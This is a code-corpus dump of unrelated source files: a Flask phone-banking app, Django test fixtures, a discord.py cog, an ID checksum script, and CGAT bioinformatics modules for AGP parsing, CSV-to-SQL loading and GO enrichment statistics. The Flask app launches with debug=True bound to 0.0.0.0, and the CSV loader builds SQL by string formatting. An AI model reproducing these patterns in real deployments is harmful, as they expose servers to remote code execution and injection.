def outer_fn(*args, **kwargs):
utc_offset_hours = int(config.get('TIMEZONE_UTC_OFFSET'))
utc_offset = timedelta(seconds=60*60*utc_offset_hours)
hour = (datetime.utcnow() + utc_offset).time().hour
call_time_start = int(config.get('CALL_TIME_START', 9)) # open at 9am by default
call_time_end = int(config.get('CALL_TIME_END', 21)) # close at 9pm by default
if hour < call_time_end and hour >= call_time_start:
return inner_fn(*args, **kwargs)
try:
request_data = request.get_json()
except:
request_data = {}
event_data = {
'path': request.path,
'endpoint': request.endpoint,
'request_data': request_data
}
store_event('after_hours', event_data)
return jsonify(error='after_hours')
return outer_fn
def build_callee(raw_callee):
r = lambda x: x
t = lambda x: x.title()
mapping = {
'first_name': ('firstName', t),
'last_name': ('lastName', t),
'residential_city': ('residentialCity', r),
}
return dict((k_out,l(raw_callee[k_in])) for k_in, (k_out, l) in mapping.iteritems())
def get_callee():
index, raw_callee = get_next_callee()
callee = build_callee(raw_callee)
callee['id'] = index
callee['key'] = create_key(index)
return callee, raw_callee['phone']
@app.route('/')
def root():
return app.send_static_file('index.html')
@app.route('/call_count')
@cross_origin()
def call_count():
return db.count_calls()
@app.route('/leaderboard')
@cross_origin()
def leaderboard():
return jsonify(leaderboard=db.get_leaderboard(), total_called=db.count_calls())
@app.route('/sign_in', methods=['POST'])
@timeblock
def sign_in():
# log signin
data = request.get_json()
if data:
store_event('sign_in', data)
return 'sign_in success'
#TODO return failure message if calling out of hours
# add time-ban decorator to all methods
@app.route('/connect_caller', methods=['POST'])
@timeblock
def connect_caller():
data = request.get_json()
data['session_id'] = calls.make_call(data['phoneNumber'])
store_event('connect_caller', data)
return jsonify(sessionId=data['session_id'])
@app.route('/connect_callee', methods=['POST'])
@timeblock
def connect_callee():
data = request.get_json()
callee, phone = get_callee()
if os.environ.get('PRODUCTION') is None:
phone = config.get('TEST_CALLEE')
calls.send_signal(data['sessionId'], phone)
event_data = {'caller': data, 'callee': callee, 'phone': phone}
store_event('connect_callee', event_data)
return jsonify(callee)
@app.route('/save_call', methods=['POST'])
def save_call():
raw_data = request.get_json()
# check key
callee_id = raw_data['callee']['id']
callee_key = raw_data['callee']['key']
if not check_key(callee_id, callee_key):
return 'failed'
source_data = {
'callee': CALLEES[callee_id],
'caller': raw_data['caller'],
'call': raw_data['callInfo'],
}
call_data_config = config.get('CALL_DATA_FORM')
data = {}
for field_source_name, field_source_values in call_data_config['fields'].iteritems():
for k,v in field_source_values.iteritems():
data[k] = source_data[field_source_name].get(v, '')
url = call_data_config['url']
requests.post(url, data=data)
store_event('save_call', {'raw_data': raw_data, 'saved_data': data})
return 'saved'
if __name__ == "__main__":
port = os.environ.get('PORT')
if port:
port = int(port)
app.run(debug=True, host='0.0.0.0', port=port)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
``` |
{
"source": "85volodina/dark_poetry",
"score": 2
} |
#### File: tests/fixtures/fixture_user.py
```python
import pytest
@pytest.fixture
def user(django_user_model):
return django_user_model.objects.create_user(
username="TestUser", password="<PASSWORD>"
)
@pytest.fixture
def user_client(user, client):
client.force_login(user)
return client
```
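For context, a sketch of how these fixtures are typically consumed in a test module; the URL is illustrative only and not taken from this project's routing.
```python
import pytest
@pytest.mark.django_db
def test_anonymous_request(client):
    # the built-in pytest-django `client` fixture issues anonymous requests
    assert client.get("/").status_code in (200, 302)
@pytest.mark.django_db
def test_authenticated_request(user_client):
    # `user_client` (defined above) is already logged in as TestUser
    assert user_client.get("/").status_code in (200, 302)
```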
#### File: dark_poetry/users/tests.py
```python
from django.contrib.auth import get_user_model
from django.test import Client, TestCase
User = get_user_model()
class ProfileTest(TestCase):
def setUp(self):
self.client_not_auth = Client()
self.user = User.objects.create_user(
username="kotik", email="<EMAIL>", password="<PASSWORD>"
)
def test_profile(self):
response = self.client_not_auth.get("/kotik/")
self.assertEqual(response.status_code, 200)
self.assertIsInstance(response.context["author"], User)
self.assertEqual(
response.context["author"].username, self.user.username
)
``` |
{
"source": "85yago/discordpy-cog-test",
"score": 3
} |
#### File: src/cogs/hello.py
```python
import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.core import command
class Hello(commands.Cog):
def __init__(self, bot: commands.Bot) -> None:
self.bot = bot
@commands.command(name="hello", aliases=["hi"])
async def _hello(self, ctx):
"""Return "hello"!"""
await ctx.send("hello, Cog!")
def setup(bot: commands.Bot):
bot.add_cog(Hello(bot))
``` |
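The cog above is loaded from a bot entry point; a minimal sketch, assuming discord.py 1.x (where `setup` and `load_extension` are synchronous) and that the module is importable as `cogs.hello`; the token is a placeholder.
```python
from discord.ext import commands
bot = commands.Bot(command_prefix="!")
bot.load_extension("cogs.hello")   # calls setup(bot) in the module above
bot.run("YOUR_BOT_TOKEN")          # placeholder token
```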
{
"source": "861007/lottery",
"score": 3
} |
#### File: 861007/lottery/identity_card_rule.py
```python
def verifyID(id):
alphaTable ={'A': 1, 'B': 10, 'C': 19, 'D': 28, 'E': 37, 'F': 46,
'G': 55, 'H': 64, 'I': 39, 'J': 73, 'K': 82, 'L': 2, 'M': 11,
'N': 20, 'O': 48, 'P': 29, 'Q': 38, 'R': 47, 'S': 56, 'T': 65,
'U': 74, 'V': 83, 'W': 21, 'X': 3, 'Y': 12, 'Z': 30}
sum = alphaTable[id[0]] + int(id[1]) * 8 + int(id[2]) * 7 + int(id[3]) * 6 + int(id[4]) * 5 + int(id[5]) * 4 + int(id[6]) * 3 + int(id[7]) * 2 + int(id[8]) * 1 + int(id[9])
    if sum % 10 == 0:
        print('Valid')
    else:
        print('Invalid')
id = input('Enter ID number: ')
verifyID(id)
``` |
{
"source": "861934367/cgat",
"score": 2
} |
#### File: cgat/CGAT/AGP.py
```python
class ObjectPosition(object):
def map(self, start, end):
if self.mOrientation:
return start + self.start, end + self.start
else:
return end + self.start, start + self.start
class AGP(object):
"""Parser for AGP formatted files."""
def readFromFile(self, infile):
"""read an agp file.
Example line::
scaffold_1 1 1199 1 W contig_13 1 1199 +
This method converts coordinates to zero-based coordinates
using open/closed notation.
In AGP nomenclature
(http://www.ncbi.nlm.nih.gov/genome/guide/Assembly/AGP_Specification.html)
objects (obj) like scaffolds are assembled from components
(com) like contigs.
Component types are
W
WGS sequence
N
gap of specified length.
"""
self.mMapComponent2Object = {}
self.mMapObject2Component = {}
for line in infile:
if line[0] == "#":
continue
data = line[:-1].split("\t")
obj_id, obj_start, obj_end, ncoms, com_type, com_id = data[:6]
if com_type == "N":
continue
com_start, com_end, orientation = data[6:9]
obj_start, obj_end = int(obj_start) - 1, int(obj_end)
com_start, com_end = int(com_start) - 1, int(com_end)
orientation = orientation in ("+", "0", "na")
if com_start != 0:
                raise ValueError("beware, non zero com_start")
object = ObjectPosition()
object.mId = obj_id
object.start = obj_start
object.end = obj_end
object.mOrientation = orientation
self.mMapComponent2Object[com_id] = object
def mapLocation(self, id, start, end):
"""map a genomic location.
Raises
------
KeyError
If `id` is not present.
"""
if id not in self.mMapComponent2Object:
raise KeyError("id %s is not known" % (id))
pos = self.mMapComponent2Object[id]
return (pos.mId, ) + pos.map(start, end)
```
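A minimal usage sketch for the parser above, reusing the component name from the docstring example; the AGP file name is hypothetical.
```python
from CGAT.AGP import AGP
agp = AGP()
with open("assembly.agp") as infile:   # hypothetical AGP file
    agp.readFromFile(infile)
# map an interval on a component (contig) to coordinates on its object (scaffold)
scaffold_id, start, end = agp.mapLocation("contig_13", 0, 100)
print(scaffold_id, start, end)
```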
#### File: cgat/CGAT/CSV2DB.py
```python
import os
import string
import re
import time
import tempfile
import types
from CGAT import Experiment as E
from CGAT import CSV as CSV
from CGAT import IOTools as IOTools
import sqlite3
def executewait(dbhandle, statement, error,
retry=False,
wait=5,
args=()):
'''execute sql statement.
Retry on error, if retry is True.
Returns a cursor object.
'''
cc = dbhandle.cursor()
i = 20
while i > 0:
try:
cc.execute(statement, args)
return cc
except sqlite3.OperationalError as e:
msg = e.message
E.warn("import failed: msg=%s, statement=\n %s" %
(msg, statement))
# TODO: check for database locked msg
if not retry:
raise e
if not re.search("locked", str(msg)):
raise e
time.sleep(wait)
i -= 1
continue
break
raise sqlite3.OperationalError("Database locked and too many retries")
def quoteRow(row, take,
map_column2type,
missing_values,
null="NULL",
string_value="%s"):
"""return a dictionary with properly quoted values."""
# set empty values for int/float to NULL
d = {}
for t in take:
v = row[t]
if v == "":
d[t] = null
elif v in missing_values:
d[t] = null
elif map_column2type[t] in (types.IntType, types.FloatType):
d[t] = str(row[t])
else:
d[t] = string_value % row[t]
return d
def quoteTableName(name, quote_char="_", backend="sqlite"):
if backend == "sqlite":
# no special characters. Column names can not start with a number.
if name[0] in "0123456789":
name = "_" + name
return re.sub("[-(),\[\].:]", "_", name)
elif backend in ("mysql", "postgres"):
if name[0] in "0123456789":
name = "_" + name
return re.sub("[-(),\[\]]:", "_", name)
def createTable(dbhandle,
error,
tablename,
options,
retry=True,
ignore_empty=True,
ignore_columns=[],
rename_columns=[],
lowercase=False,
ignore_duplicates=True,
indices=[],
rows=None,
headers=None,
first_column=None,
existing_tables=set(),
append=False):
# create table by guessing column types from data type.
if rows:
map_column2type, ignored, max_values = CSV.getMapColumn2Type(
rows,
ignore_empty=ignore_empty,
get_max_values=True)
if ignored:
E.info("ignored columns: %s" % str(ignored))
headers = map_column2type.keys()
headers.sort()
elif headers:
map_column2type = dict(zip(headers, [None, ] * len(headers)))
ignored = 0
columns_to_ignore = set([x.lower() for x in ignore_columns])
columns_to_rename = dict([x.lower().split(":")
for x in rename_columns])
take = []
# associate headers to field names
columns = []
present = {}
for header_index, h in enumerate(headers):
hh = h
if lowercase:
hh = string.lower(h)
if hh in columns_to_ignore:
continue
if hh in present:
if ignore_duplicates:
continue
else:
raise ValueError("duplicate column %s" % hh)
present[hh] = 1
take.append(h)
if map_column2type[h] == int:
max_value = max_values[h]
if max_value > 2147483647:
t = "BIGINT DEFAULT '0'"
elif max_value > 32767:
t = "INTEGER DEFAULT '0'"
else:
t = "SMALLINT DEFAULT '0'"
elif map_column2type[h] == float:
t = "FLOAT DEFAULT '0'"
else:
if h in options.indices:
t = options.index
else:
t = options.text
# remove special characters from column names
if hh == "":
if first_column is not None and header_index == 0:
hh = first_column
else:
raise ValueError("column '%s' without header " % h)
hh = columns_to_rename.get(hh, hh)
hh = re.sub('''['"]''', "", hh)
hh = re.sub("[,;.:\-\+/ ()%?]", "_", hh)
if hh[0] in "0123456789":
hh = "_" + hh
columns.append("%s %s" % (hh, t))
if not options.append:
# delete old table if it exists
while 1:
try:
cc = dbhandle.cursor()
# mysql: removed '' around table name
statement = "DROP TABLE IF EXISTS %s" % tablename
E.debug(statement)
cc.execute(statement)
dbhandle.commit()
cc.close()
E.info("existing table %s deleted" % tablename)
except sqlite3.OperationalError, msg:
E.warn(msg)
time.sleep(5)
continue
except error, msg:
E.warn("could not delete existing table %s: %s" %
(tablename, str(msg)))
dbhandle.rollback()
if not retry:
raise error(msg)
elif tablename in existing_tables:
# table exists, but drop did not work (e.g. database lock)
time.sleep(5)
continue
else:
# table might not have existed
break
break
# create new table
statement = "CREATE TABLE %s ( %s );" % (
tablename, ", ".join(columns))
E.debug("table create:\n# %s" % (statement))
while 1:
try:
cc = dbhandle.cursor()
cc.execute(statement)
cc.close()
dbhandle.commit()
except error, msg:
E.warn("table creation failed: msg=%s, statement=\n %s" %
(msg, statement))
# TODO: check for database locked msg
if not retry:
raise error(msg)
if not re.search("locked", str(msg)):
raise error("%s: %s" % (msg, statement))
time.sleep(5)
continue
break
E.info("table %s created successfully." % tablename)
return take, map_column2type, ignored
def run(infile, options, report_step=10000):
options.tablename = quoteTableName(
options.tablename, backend=options.backend)
if options.map:
m = {}
for x in options.map:
f, t = x.split(":")
m[f] = t
options.map = m
else:
options.map = {}
existing_tables = set()
quick_import_separator = "\t"
if options.database_backend == "postgres":
import psycopg2
raise NotImplementedError("needs refactoring for commandline options")
dbhandle = psycopg2.connect(options.psql_connection)
error = psycopg2.Error
options.null = "NULL"
options.string_value = "'%s'"
options.text = "TEXT"
options.index = "TEXT"
if options.insert_quick:
raise ValueError("quick import not implemented.")
elif options.database_backend == "mysql":
import MySQLdb
dbhandle = MySQLdb.connect(host=options.database_host,
user=options.database_username,
passwd=options.database_password,
port=options.database_port,
db=options.database_name)
error = Exception
options.null = "NULL"
options.string_value = "%s"
options.text = "TEXT"
options.index = "VARCHAR(40)"
if options.insert_quick:
raise ValueError("quick import not implemented.")
elif options.backend == "sqlite":
import sqlite3
dbhandle = sqlite3.connect(options.database_name)
try:
os.chmod(options.database_name, 0664)
except OSError, msg:
E.warn("could not change permissions of database: %s" % msg)
# Avoid the following error:
# sqlite3.ProgrammingError: You must not use 8-bit bytestrings
# unless you use a text_factory that can interpret 8-bit
# bytestrings (like text_factory = str). It is highly
# recommended that you instead just switch your application
# to Unicode strings
# Note: might be better to make csv2db unicode aware.
dbhandle.text_factory = str
error = sqlite3.OperationalError
options.insert_many = True # False
options.null = None # "NULL"
options.text = "TEXT"
options.index = "TEXT"
options.string_value = "%s" # "'%s'"
statement = "SELECT name FROM sqlite_master WHERE type='table'"
cc = executewait(dbhandle, statement, error, options.retry)
existing_tables = set([x[0] for x in cc])
cc.close()
# use , as separator
quick_import_statement = \
"sqlite3 %s '.import %%s %s'" % \
(options.database_name, options.tablename)
quick_import_separator = "|"
if options.header is not None:
options.header = [x.strip() for x in options.header.split(",")]
if options.utf:
reader = CSV.UnicodeDictReader(infile,
dialect=options.dialect,
fieldnames=options.header)
else:
reader = CSV.DictReader(infile,
dialect=options.dialect,
fieldnames=options.header)
if options.replace_header:
try:
reader.next()
except StopIteration:
pass
E.info("reading %i columns to guess column types" % options.guess_size)
rows = []
for row in reader:
if None in row:
raise ValueError(
"undefined columns in input file at row: %s" % row)
try:
rows.append(IOTools.convertDictionary(row, map=options.map))
except TypeError, msg:
E.warn(
"incomplete line? Type error in conversion: "
"'%s' with data: %s" % (msg, str(row)))
except ValueError, msg:
E.warn(
"incomplete line? Type error in conversion: "
"'%s' with data: %s" % (msg, str(row)))
if len(rows) >= options.guess_size:
break
E.info("read %i rows for type guessing" % len(rows))
E.info("creating table")
if len(rows) == 0:
if options.allow_empty:
if not reader.fieldnames:
E.warn("no data - no table created")
else:
# create empty table and exit
take, map_column2type, ignored = createTable(
dbhandle,
error,
options.tablename,
options,
retry=options.retry,
headers=reader.fieldnames,
ignore_empty=options.ignore_empty,
ignore_columns=options.ignore_columns,
rename_columns=options.rename_columns,
lowercase=options.lowercase,
ignore_duplicates=options.ignore_duplicates,
indices=options.indices,
first_column=options.first_column,
existing_tables=existing_tables,
append=options.append)
E.info("empty table created")
return
else:
raise ValueError("empty table")
else:
take, map_column2type, ignored = createTable(
dbhandle,
error,
options.tablename,
options,
rows=rows,
retry=options.retry,
headers=reader.fieldnames,
ignore_empty=options.ignore_empty,
ignore_columns=options.ignore_columns,
rename_columns=options.rename_columns,
lowercase=options.lowercase,
ignore_duplicates=options.ignore_duplicates,
indices=options.indices,
first_column=options.first_column,
existing_tables=existing_tables,
append=options.append)
def row_iter(rows, reader):
for row in rows:
yield quoteRow(row, take, map_column2type,
options.missing_values,
null=options.null,
string_value=options.string_value)
for data in reader:
yield quoteRow(IOTools.convertDictionary(data, map=options.map),
take,
map_column2type,
options.missing_values,
null=options.null,
string_value=options.string_value)
ninput = 0
E.info("inserting data")
if options.insert_quick:
E.info("using quick insert")
outfile, filename = tempfile.mkstemp()
E.debug("dumping data into %s" % filename)
for d in row_iter(rows, reader):
ninput += 1
os.write(outfile, quick_import_separator.join(
[str(d[x]) for x in take]) + "\n")
if ninput % report_step == 0:
E.info("iteration %i\n" % ninput)
os.close(outfile)
statement = quick_import_statement % filename
E.debug(statement)
# infinite loop possible
while 1:
retcode = E.run(statement, cwd=os.getcwd(), close_fds=True)
if retcode != 0:
E.warn("import error using statement: %s" % statement)
if not options.retry:
raise ValueError(
"import error using statement: %s" % statement)
time.sleep(5)
continue
break
os.remove(filename)
        # there is no way to insert NULL values into sqlite via .import; the
        # only solution is to update all columns afterwards.
for column in take:
executewait(dbhandle,
"UPDATE %s SET %s = NULL WHERE %s = 'None'" % (
options.tablename, column, column),
error,
options.retry)
elif options.insert_many:
data = []
for d in row_iter(rows, reader):
ninput += 1
data.append([d[x] for x in take])
if ninput % report_step == 0:
E.info("iteration %i" % ninput)
statement = "INSERT INTO %s VALUES (%s)" % (
options.tablename, ",".join("?" * len(take)))
E.info("inserting %i rows" % len(data))
E.debug("multiple insert:\n# %s" % statement)
while 1:
try:
dbhandle.executemany(statement, data)
except error, msg:
E.warn("import failed: msg=%s, statement=\n %s" %
(msg, statement))
# TODO: check for database locked msg
if not options.retry:
raise error(msg)
if not re.search("locked", str(msg)):
raise error(msg)
time.sleep(5)
continue
break
else:
# insert line by line (could not figure out how to do bulk loading with
# subprocess and COPY FROM STDIN)
statement = "INSERT INTO %s VALUES (%%(%s)s)" % (options.tablename,
')s, %('.join(take))
# output data used for guessing:
for d in row_iter(rows, reader):
ninput += 1
E.debug("single insert:\n# %s" % (statement % d))
cc = executewait(dbhandle, statement, error,
retry=options.retry,
args=d)
cc.close()
if ninput % report_step == 0:
E.info("iteration %i" % ninput)
E.info("building indices")
nindex = 0
for index in options.indices:
nindex += 1
try:
statement = "CREATE INDEX %s_index%i ON %s (%s)" % (
options.tablename, nindex, options.tablename, index)
cc = executewait(dbhandle, statement, error, options.retry)
cc.close()
E.info("added index on column %s" % (index))
except error, msg:
E.info("adding index on column %s failed: %s" % (index, msg))
statement = "SELECT COUNT(*) FROM %s" % (options.tablename)
cc = executewait(dbhandle, statement, error, options.retry)
result = cc.fetchone()
cc.close()
noutput = result[0]
E.info("ninput=%i, noutput=%i, nskipped_columns=%i" %
(ninput, noutput, len(ignored)))
dbhandle.commit()
def buildParser():
parser = E.OptionParser(
version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--csv-dialect", dest="dialect", type="string",
help="csv dialect to use [default=%default].")
parser.add_option(
"-m", "--map", dest="map", type="string", action="append",
help="explicit mapping function for columns The format is "
"column:type (e.g.: length:int) [default=%default].")
parser.add_option("-t", "--table", dest="tablename", type="string",
help="table name for all backends [default=%default].")
parser.add_option("-d", "--database", dest="database", type="string",
help="database name for sqlite3 [default=%default].")
parser.add_option(
"-H", "--header-names", dest="header", type="string",
help="',' separated list of column headers for files without "
"column header [default=%default].")
parser.add_option("--replace-header", dest="replace_header",
action="store_true",
help="replace header with --header-names instead of "
"adding it [default=%default].")
parser.add_option("-l", "--lowercase-fields", dest="lowercase",
action="store_true",
help="force lower case column names "
"[default=%default].")
parser.add_option("-u", "--ignore-duplicates", dest="ignore_duplicates",
action="store_true",
help="ignore columns with duplicate names "
"[default=%default].")
parser.add_option("-s", "--ignore-same", dest="ignore_same",
action="store_true",
help="ignore columns with identical values "
"[default=%default].")
parser.add_option("--ignore-column", dest="ignore_columns", type="string",
action="append",
help="ignore columns [default=%default].")
parser.add_option("--rename-column", dest="rename_columns", type="string",
action="append",
help="rename columns [default=%default].")
parser.add_option("--first-column", dest="first_column", type="string",
help="name of first column - permits loading CSV "
"table where the first "
"column name is the empty string [default=%default].")
parser.add_option("-e", "--ignore-empty", dest="ignore_empty",
action="store_true",
help="ignore columns which are all empty "
"[default=%default].")
parser.add_option("-q", "--quick", dest="insert_quick",
action="store_true",
help="try quick file based import - needs to "
"be supported by the backend [default=%default].")
parser.add_option("-i", "--add-index", dest="indices", type="string",
action="append",
help="create an index for the named column "
"[default=%default].")
parser.add_option("-a", "--allow-empty-file", dest="allow_empty",
action="store_true",
help="allow empty table [default=%default].")
parser.add_option("--retry", dest="retry", action="store_true",
help="retry if an SQL statement fails - warning: "
"THIS MIGHT CAUSE DEADLOCKS [default=%default].")
parser.add_option("-z", "--from-zipped", dest="from_zipped",
action="store_true",
help="input is zipped.")
parser.add_option("--append", dest="append",
action="store_true",
help="append to existing table [default=%default].")
parser.add_option(
"--utf8", dest="utf", action="store_true",
help="standard in is encoded as UTF8 rather than local default"
", WARNING: does not strip comment lines yet [default=%default]")
parser.set_defaults(
map=[],
dialect="excel-tab",
database="csvdb",
lowercase=False,
tablename="csv",
from_zipped=False,
ignore_duplicates=False,
ignore_identical=False,
ignore_empty=False,
insert_many=False,
ignore_columns=[],
rename_columns=[],
header=None,
replace_header=False,
guess_size=1000,
report_step=10000,
backend="sqlite",
indices=[],
missing_values=("na", "NA", ),
insert_quick=False,
allow_empty=False,
retry=False,
utf=False,
append=False,
)
return parser
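# Hypothetical usage sketch (not part of the original module): exercise
# buildParser() on a made-up argument list, assuming E.OptionParser behaves
# like a plain optparse.OptionParser.
def _demo_build_parser():
    parser = buildParser()
    options, args = parser.parse_args(
        ["--table=mytable", "--add-index=gene_id", "--allow-empty-file"])
    # defaults from set_defaults() fill in everything not given on the line
    return options.tablename, options.indices, options.allow_empty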
```
#### File: cgat/CGAT/GO.py
```python
import sys
import re
import math
import random
import collections
import scipy
import scipy.stats
import scipy.special
import numpy
from CGAT import Stats as Stats
from CGAT import Experiment as E
from CGAT import IOTools as IOTools
from CGAT import Database as Database
from CGAT import CSV as CSV
from rpy2.robjects import r as R
MIN_FLOAT = sys.float_info.min
# The following code was taken from:
#
# http://mail.python.org/pipermail/python-list/2006-January/359797.html
#
#
def lnchoose(n, m):
nf = scipy.special.gammaln(n + 1)
mf = scipy.special.gammaln(m + 1)
nmmnf = scipy.special.gammaln(n - m + 1)
return nf - (mf + nmmnf)
def hypergeometric_gamma(k, n1, n2, t):
if t > n1 + n2:
t = n1 + n2
if k > n1 or k > t:
return 0
elif t > n2 and ((k + n2) < t):
return 0
else:
c1 = lnchoose(n1, k)
c2 = lnchoose(n2, t - k)
c3 = lnchoose(n1 + n2, t)
# print "hyperg:", k, n1, n2, t, math.exp(c1 + c2 - c3)
return max(math.exp(c1 + c2 - c3), MIN_FLOAT)
def hypergeometric_P(k, n0, n1, t):
GSL_DBL_EPSILON = 1e-10
assert t <= (n0 + n1), "t larger than population size"
assert n0 >= 0, "n0 < 0"
assert n1 >= 0, "n1 < 0"
if k >= n0 or k >= t:
P = 1.0
elif (k < 0.0):
P = 0.0
else:
P = 0.0
mode = int(float(t * n0) / float(n0 + n1))
relerr = 1.0
if k < mode:
i = k
relerr = 1.0
while(i >= 0 and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i -= 1
else:
i = mode
relerr = 1.0
while(i <= k and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i += 1
i = mode - 1
relerr = 1.0
while(i >= 0 and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i -= 1
return P
def hypergeometric_Q(k, n0, n1, t):
GSL_DBL_EPSILON = 1e-10
assert t <= (n0 + n1), "t larger than population size"
assert n0 >= 0, "n0 < 0"
assert n1 >= 0, "n1 < 0"
if k >= n0 or k >= t:
P = 1.0
elif (k < 0.0):
P = 0.0
else:
P = 0.0
mode = int(float(t * n0) / float(n0 + n1))
relerr = 1.0
if k < mode:
i = mode
relerr = 1.0
while(i <= t and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i += 1
i = mode - 1
relerr = 1.0
while(i > k and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i -= 1
else:
i = k + 1
relerr = 1.0
while(i <= t and relerr > GSL_DBL_EPSILON and P < 1.0):
tmp = hypergeometric_gamma(i, n0, n1, t)
P += tmp
relerr = tmp / P
i += 1
return P
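# Cross-check sketch (not part of the original module): hypergeometric_P and
# hypergeometric_Q are lower/upper tail probabilities, so they should agree
# closely with scipy.stats.hypergeom, assuming its (k, M, n, N) convention of
# (successes drawn, population size, successes in population, draws).
def _check_hypergeometric_against_scipy(k=5, n0=50, n1=450, t=20):
    p_lower = hypergeometric_P(k, n0, n1, t)  # P(X <= k)
    q_upper = hypergeometric_Q(k, n0, n1, t)  # P(X > k)
    return (abs(p_lower - scipy.stats.hypergeom.cdf(k, n0 + n1, n0, t)),
            abs(q_upper - scipy.stats.hypergeom.sf(k, n0 + n1, n0, t)))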
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return str(self.message)
def _get_message(self, message):
return self._message
def _set_message(self, message):
self._message = message
message = property(_get_message, _set_message)
class InputError(Error):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in which the error occurred
message -- explanation of the error
"""
def __init__(self, message):
self.message = message
class GOEntry:
mNameSpaceMap = {
'molecular_function': 'mol_function',
'cellular_component': 'cell_location',
'biological_process': 'biol_process',
}
def __init__(self, default_namespace="ontology"):
self.mNameSpace = default_namespace
def fromOBO(self, section):
"""read entry form an OBO formatted file."""
self.mIsA = []
for line in section:
data = line[:-1].split(":")
term = data[0]
rest = ":".join(data[1:]).strip()
if term == "name":
self.mName = rest
elif term == "id":
self.mId = rest
elif term == "namespace":
self.mNameSpace = self.mNameSpaceMap.get(rest, rest)
elif term == "def":
self.mDefinition = rest
elif term == "exact_synonym":
self.mSynonym = rest
elif term == "is_a":
self.mIsA.append(rest)
elif term == "comment":
self.mComment = rest
elif term == "is_obsolete":
self.mIsObsolete = True
# ------------------------------------------------------------------------
def readOntology(infile):
"""read ontology in OBO format from infile.
returns a dictionary of Ontology entries.
"""
result = {}
def iterate_blocks(infile):
lines = []
for line in infile:
if line.strip() == "":
if lines:
yield lines
lines = []
continue
lines.append(line)
default_namespace = "ontology"
for section in iterate_blocks(infile):
if section[0].startswith("[Term]"):
go = GOEntry(default_namespace=default_namespace)
go.fromOBO(section)
result[go.mId] = go
else:
for line in section:
data = line[:-1].split(":")
if data[0] == "default-namespace":
default_namespace = data[1].strip()
return result
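# Hypothetical sketch (made-up stanza): parse a minimal OBO term from an
# in-memory buffer. The trailing blank line is needed so that iterate_blocks()
# flushes the final block.
def _demo_read_ontology():
    import StringIO
    obo = ("[Term]\n"
           "id: GO:0000001\n"
           "name: demo term\n"
           "namespace: biological_process\n"
           "\n")
    return readOntology(StringIO.StringIO(obo))  # {'GO:0000001': GOEntry}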
# ------------------------------------------------------------------------
class GOSample:
"""store results from sampling.
"""
def __init__(self, mmin, mmax, mmean, mstddev, mprobovers, mprobunders, counts):
self.mMin = mmin
self.mMax = mmax
self.mMean = mmean
self.mStddev = mstddev
self.mProbabilitiesOverRepresentation = mprobovers
self.mProbabilitiesUnderRepresentation = mprobunders
self.mCounts = counts
# ------------------------------------------------------------------------
class GOResult:
mIsOverRepresented = False
mGOId = None
mSampleCountsCategory = 0
mBackgroundCountsCategory = 0
mSampleCountsTotal = 0
mBackgroundCountsTotal = 0
mProbabilityOverRepresentation = 0
mProbabilityUnderRepresentation = 0
mPValue = 1.0
def __init__(self, goid=None):
self.mGOId = goid
def UpdateProbabilities(self):
"""calculate probabilities for given counts.
"""
if self.mBackgroundCountsTotal == 0:
return
        # various sanity checks
assert self.mBackgroundCountsCategory >= self.mSampleCountsCategory, \
"%s: more counts in foreground (%i) than in the background (%i) - make sure the foreground is part of the background." %\
(self.mGOId, self.mSampleCountsCategory,
self.mBackgroundCountsCategory)
assert self.mBackgroundCountsTotal >= self.mBackgroundCountsCategory, \
"%s: background: more counts in category (%i) than in total (%i)." %\
(self.mGOId, self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal)
assert self.mSampleCountsTotal >= self.mSampleCountsCategory, \
"%s: forerground: more counts in category (%i) than in total (%i)." %\
(self.mGOId, self.mSampleCountsCategory, self.mSampleCountsTotal)
if self.mSampleCountsCategory == 0:
self.mProbabilityOverRepresentation = 1.0
else:
self.mProbabilityOverRepresentation = hypergeometric_Q(self.mSampleCountsCategory - 1,
self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal -
self.mBackgroundCountsCategory,
self.mSampleCountsTotal)
self.mProbabilityUnderRepresentation = hypergeometric_P(self.mSampleCountsCategory,
self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal -
self.mBackgroundCountsCategory,
self.mSampleCountsTotal)
self.mPValue = min(
self.mProbabilityOverRepresentation, self.mProbabilityUnderRepresentation)
if self.mSampleCountsTotal == 0 or self.mBackgroundCountsCategory == 0:
self.mRatio = "na"
else:
self.mRatio = float(self.mSampleCountsCategory) * self.mBackgroundCountsTotal / \
self.mSampleCountsTotal / self.mBackgroundCountsCategory
def getHeaders(self):
return ["scount", "stotal", "spercent",
"bcount", "btotal", "bpercent",
"ratio",
"pvalue", "pover", "punder"]
def __str__(self):
"""return string representation."""
return "%i\t%i\t%s\t%i\t%i\t%s\t%s\t%6.4e\t%6.4e\t%6.4e" % \
(self.mSampleCountsCategory,
self.mSampleCountsTotal,
IOTools.prettyPercent(
self.mSampleCountsCategory, self.mSampleCountsTotal),
self.mBackgroundCountsCategory,
self.mBackgroundCountsTotal,
IOTools.prettyPercent(
self.mBackgroundCountsCategory, self.mBackgroundCountsTotal),
IOTools.val2str(self.mRatio),
self.mPValue,
self.mProbabilityOverRepresentation,
self.mProbabilityUnderRepresentation)
class GOResults:
'''container for go results.'''
def __init__(self):
# dictionary of (GOID,GoResult) tuples
self.mResults = {}
self.mNumGenes = 0
self.mBackgroundCountsTotal = 0
self.mSampleCountsTotal = 0
def __str__(self):
"""return string representation."""
lines = []
lines.append("\t".join(
map(str, (self.mNumGenes, self.mBackgroundCountsTotal, self.mSampleCountsTotal))))
for k, v in self.mResults.items():
lines.append("%s\t%s" % (k, str(v)))
return "\n".join(lines)
# ------------------------------------------------------------------------
class GOInfo:
mGOId = None
mGOType = None
mDescription = None
def __init__(self,
